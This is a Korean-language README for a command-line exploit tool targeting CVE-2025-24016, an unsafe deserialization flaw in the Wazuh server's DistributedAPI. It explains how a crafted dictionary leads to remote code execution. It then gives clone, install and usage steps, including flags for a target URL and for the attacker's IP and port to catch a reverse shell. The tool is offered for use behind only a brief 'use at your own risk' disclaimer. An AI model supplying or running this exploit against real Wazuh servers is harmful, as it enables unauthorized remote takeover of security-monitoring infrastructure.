
Wazuh의 안전하지 않은 역직렬화 취약점에 대한 독립형 CLI 익스플로잇으로, 조작된 DAPI 사전을 주입하여 원격 코드 실행을 허용하고 리버스 셸을 얻습니다.
Wazuh 서버의 안전하지 않은 역직렬화 취약점으로, DAPI 요청/응답에서 정제되지 않은 딕셔너리 주입을 통해 원격 코드 실행이 가능합니다. 이 문제는 DistributedAPI 파라미터가 JSON으로 직렬화된 후 framework/wazuh/core/cluster/common.py의 as_wazuh_object 함수를 통해 역직렬화되는 방식에서 발생합니다.
공격자가 DAPI 요청 또는 응답에 정제되지 않은 딕셔너리를 주입하면 처리되지 않은 예외(unhandled_exc)를 조작하여 임의의 Python 코드를 실행할 수 있습니다.

| ❗ 면책 고지 |
|---|
| 이 프로젝트는 주로 독립형 CLI 도구로 사용하기 위해 제작되었습니다. 이 익스플로잇을 서비스로 실행하면 보안 위험이 발생할 수 있습니다. 주의하여 사용하고 추가 보안 조치를 적용하는 것이 좋습니다. DWYOR |
git clone https://github.com/0xjessie21/CVE-2025-24016.git
cd CVE-2025-24016/
pip install -r requirements.txt
python3 CVE-2025-24016.py -h
도구에 대한 도움말을 표시합니다. 지원되는 모든 스위치는 다음과 같습니다.
Usage:
python3 CVE-2025-24016.py [flags]
options:
-h, --help 이 도움말 메시지를 표시하고 종료합니다
-u URL, --url URL 대상 URL (예: https://<worker-server>:55000/security/user/authenticate/run_as)
-i IP, --ip IP 리버스 셸 연결을 위한 로컬 호스트
-p PORT, --port PORT 리버스 셸 연결을 위한 로컬 포트